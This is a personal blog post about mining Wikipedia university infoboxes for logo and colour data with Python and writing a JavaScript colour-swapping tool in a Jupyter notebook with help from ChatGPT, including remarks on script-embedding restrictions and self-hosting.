Datamining Wikipedia and writing JS with ChatGTP just to swap the colours on university logos…

I am not sure the University of Oxford logo works in the gold from the University of Otago…

A few months back I moved from the Oxford BRC to OPIG, both within the university of Oxford, but like many in academia I have moved across a few universities. As this is my first post here I wanted to do something neat: a JS tool that swapped colours in university logos!
It was a rather laborious task requiring a lot of coding, but once I got it working, I ended up tripping up at the last metre. So for technical reasons, I have resorted to hosting it in my own blog (see post), but nevertheless the path towards it is worth discussing.

Requirements

In order to make a logo of a university with the colours of another, the following are required:

  1. Determine the ability to upload content with JavaScript on the target post
  2. Find or create a dataset of both university logo and the university colour for most universities
  3. Write JS code that matches a user input to a university name in the above dataset, fetch the logo off the stored address and allow the user to chose which colours and replace the colours

Embedding JavaScript

I failed at my groundwork for this point. My blog is a Blogger site —”for now” I have been telling myself for the last decade—, which does allow script elements in the HTML, and, having not posted on a WordPress blog, I did a quick Google search and there seemed to be a lot of ways. I did not check if the rules were current and they weren’t: I should have done a simple test with just <script>alert('hello world')</script>.
Troubles of writing in JavaScript apart, which I will cover in my third point, embedding JavaScript somewhere is often disallowed. For example in GitHub markdown you can add certain HTML elements happily but not the script element, onclick and other tag for inline event listeners and even the style tag for inline CSS. In my webapp Michelanglo I implemented the same —with the Python library bleach. The reason is because it would allow cross-site script theft of information such as cookies: when one logs into a site, the password gets hashed and compared to a stored hash (plain text password storage is a big no-no) and the user’s browser gets given a cookie, which is used in the header of all subsequent requests avoiding having to send the username and password each time, but were it intercepted (assuming no SSL layer, the s in https) or stolen via XSS one’s identity would be stolen. So I am in a way glad that JS embedding is disabled on this blog given its multiuser nature.

Hosting parenthesis

In terms of GitHub, GitHub pages allows one to embed whatever content one wants as it runs in its own nodejs webapp. So that is the recommended way. Truth be told I disagree with the idea that the free external hosting solutions are the best. Definitely they are better than paid solutions which get expensive as they years pile on, but they are not overly permanent and not worth the faff and having to move frequently. Two decades ago, everyone was making Geocities pages, until it got shut down due to the proliferation of disgusting and illegal content. Then a decade ago one could serve HTML pages and other files from Dropbox and a few other sites, but this run into the same issue. Half a decade ago GitHub also stop serving its raw HTML as HTML. It then stopped JS being served allowing cross-origin (as do CDNs) and a then a few years Rawgit, it’s fill in replacement, also kicked the bucket, but that was because of Bitcoin miners. For a webapp in Python (a D&D encounter simulator) I was using the free tier of OpenShift Online, but then I had to flee in 2017 when they changed the T&Cs and throttled down its usability. I moved to hosting webapps and the like at home first on Raspberry Pi 3 and then on an £100 Intel Nuc. Even if this is not viable for work projects and the sys-admin stuff had a sharp firefighting-driven learning curve, I am very pleased with it and have a dozen wee web apps run on it. I should say this is not a common viewpoint, but just my personal experience.

Wikipedia datamining

I am a big fan of using Wikipedia for soft data. Specifically, in wikimarkup there are these code blocks called (templates), which allow information to be shown in a consistent way thanks to set fields, in particular there are infoboxes, which appear on the right hand side in Latin alphabet wikipedia sites, which summarise something, in the case of articles of universities, the Infobox_university is used. I have previously datamined wikipedia for all sorts of things (cf. code used). A nice extra is the site visitor data which tells how popular an article is and given that articles are clustered by category, with which I have made silly figures such as most popular stars, places on Mars, dinosaurs, planes.
The data is however dirty, so does require some polishing.

Mining

For a small subset of a few hundred one can simply download all the pages from that category. For this project, where there are five thousand articles about universities, I used the downloaded English wikipedia XML.
Specifically, I previously used a small class I wrote to iteratively find all the pages with infoboxes and get data from them.

from wiki_category_analyser import WikicatParser
pages = WikicatParser(category='Category:Articles_using_infobox_university',
                      wanted_templates=['Infobox_university'])
pages.get_pages_recursively()
print(pages.data)
table = pages.to_dataframe()

This approach does not work well as it takes forever, when dealing with large datasets.
So I am not overly keen on downloading GB sized files for once in a while curiosities,
but in this case downloading english Wikipedia is easier —and yes, without figures, revisions or other metadata English Wikipedia is only 20 GB in compressed form, which is creepily small.

import mwxml, bz2

dump = mwxml.Dump.from_file(bz2.open('dumps/enwiki-latest-pages-articles.xml.bz2',
                                     mode='rt', encoding='utf-8')
                           )
print(dump.site_info.name)  # Wikipedia
print(dump.site_info.dbname)  # enwiki

for page in dump:
    revision = next(page)
    ...

However, my first attempt using my parser, which is built on wikitextparser, could not deal with nested templates,
because its dependency is most likely regex-based as opposed to XML-like (cf. the famous Stack Overflow comedic answer on XML parsing by regex),
so weird hacks are required.

wp = WikicatParser('', wanted_templates='Infobox university')

import re, functools
import pickle, gzip

def remove_cat(text, category):
    """
    A poor hack to circumvent nested templates
    """
    return re.sub(r'\{\{'+category+r'[^{}]*\}\}', '', text)

data = []

for page in dump:
    revision = next(page)
    if revision.text is None:
        continue
    if 'Infobox university' not in revision.text:
        continue
    text = revision.text.replace('\n','').replace('{{!}}', '')
    cleaned_text = functools.reduce(remove_cat, ['Cite', 'cite', 'Efn'], text)
    info = wp.parse_templates(revision.text)
    if 'name' not in info:
        continue
    data.append({'name': info['name'], 
                 'image_name': info.get('image_name', None),
                 'colors': info.get('colors', info.get('colours', None) )
                })

with gzip.open('unicolors.pkl.gz', 'wb') as fh:
    pickle.dump(data, fh)
len(data)

However, storing the whole of info reveals further issues.
US universities have colors, British ones colours, while Spanish universities have the tag colores. In my code I comment in BE, but call my variables in AE, so I cannot really complain.

from typing import List, Dict, TypedDict
import pandas as pd
import pandera.typing as pdt

data: pd.DataFrame = pd.read_pickle('unicolors.p')
na2list = lambda v: v if isinstance(v, list) else []
data['hex']: pdt.Series[str] = data.colors.str.findall(r'(#\w+)').apply(na2list) + \
                               data.colours.str.findall(r'(#\w+)').apply(na2list)
data['name']: pdt.Series[str] = data['name'].str.replace(r'\{\{lang\|.*?\|(.*?)\}\}', r'\1', regex=True)\
                                            .str.replace('\'\'\'','', regex=False).fillna('').str.strip()

import re

def get_image(row: pd.Series):
    for entry in (row.logo, row.image, row.image_name):
        if isinstance(entry, str) and entry.strip():
            cleaned:str = entry.replace('File:', '').strip()
            return re.sub(r'[\[\]]', '', cleaned)
    return ''

data['image_name']: pdt.Series[str] = data.apply(get_image, axis=1)
data = data.loc[data['name'] != '']

import json


#d = data.loc[data.image_name.str.contains('.svg')].set_index('name').image_name.to_dict()
json_data = json.dumps(data[['name', 'image_name', 'hex']]\
                       .rename(columns={'hex': 'colors'})\
                       .to_dict(orient='records'))

with open('../wiki-university-colours/universities.json', 'w') as fh:
    fh.write(json_data)

Done! Before moving on, I should point out that in the above I typehint my pandas with pandera.typing: if you are unfamiliar with it, do check it out it as it removes the pain of revising code, especially for rushed data analyses.

JS writing in a Jupyterlab notebook

I normally write Python for data exploration or functionality testing in a notebook, so I gave it a go with JS.
It should be said that Colab notebooks are run in embedded spaces, a sandpit basically, so nothing can get out of them, whereas here I am talking about Jupyter lab notebooks —or even þe olde plain Jupyter notebooks.
In a regular notebook, the output area HTMLElement is element and anything appended to window will be visible everywhere.
Go main namespace pollution!

from IPython.display import display, HTML

import json

json_data = json.dumps(data[['name', 'image_name', 'hex']]\
                       .rename(columns={'hex': 'colors'})\
                       .to_dict(orient='records'))

display(HTML(f'<script>window.universities={json_data};</script>'))

with open('universities.json') as fh:
    js_block = fh.read();
display(HTML(f'<script type="module" id="university-code">{js_block}</script>'))

This means if I have a cell will the cell magic %%javascript I can do:

import { University, UniCombineColor } from './university-code.js';
new UniCombineColor(element);

I actually wrote the JS in a large cell and did not do the module approach until the end.

I can code in Python and JS, but I struggle to manage both at the same time and it takes me a while to get back into the other. This is both the vocabulary and the grammar, for example len(foo) in Python is foo.length in JS, and for example in Python list comprensions ([v+1 for v in foo]) are more common that the map function (tuple(map(lambda v: v+1, foo)) or worse *map(functools.partial(operator.add, 1), foo),), but in JS the latter is (foo.map(v => v+1)). Crucially, I can read them fine. As a result I gave a new tactic a go: get chatGTP to write my code following my corrections.
I asked the robot things I could have easily googled, e.g. “What are the options for event listeners for an input box of type text?”, but also to write small snippets with explicit variable names and repeating the term vanilla JS. The latter questions were very constructive. But asking it write larger snippets was problematic as it kept needing corrections, for example these are an actual series of consecutive requests:

  • Could you write a vanilla JS snippet that given an input box with id uni_input and a div, that when there is a change in the input box it adds to the div a series of buttons (max 10) with a value from an array which contains the value of the input box
  • I meant that an array is provided (called university_names), which is filtered to find matches with the value of the input box and show these (max 10)
  • Could you tweak it to use arrow functions?
  • change the JS variable from input to text_input

Due to limits, ChatGTP requests on large code blocks, such as adding JSDocs, were cut short and towards the end I wrote without it, such as refactoring the snippets into a class and other changes.
However, in terms of getting started it was very constructive as I was rusty on JS.

    In terms of writing JS in a notebook, I won’t lie, it wasn’t great. It is less of a faff than working with a monolithic webapp project in PyCharm
    or writing code in the console obviously, but it was not pleasant. It potentially was that writing in HTML or JS file in PyCharm and checking by pressing shift-F5 continually.

    The code highlighting was off-wack as // was not seen as a comment, while # was. In the code in fact I could not do /#[0-9A-Z]{6}/gi because it saw it as thought the command was unterminated, so I had to new RegExp it, which is sad.
    The second issue I encountered was that Tabnine, a less powerful Copilot for notebooks, kept entering infinite looks. Whereas had I used PyCharm I would have had the help of Copilot. One can run notebooks in PyCharm (it just takes an annoying minute or two to get right), so for next time I will do that, aided by chatGTP for the simple things.

    Author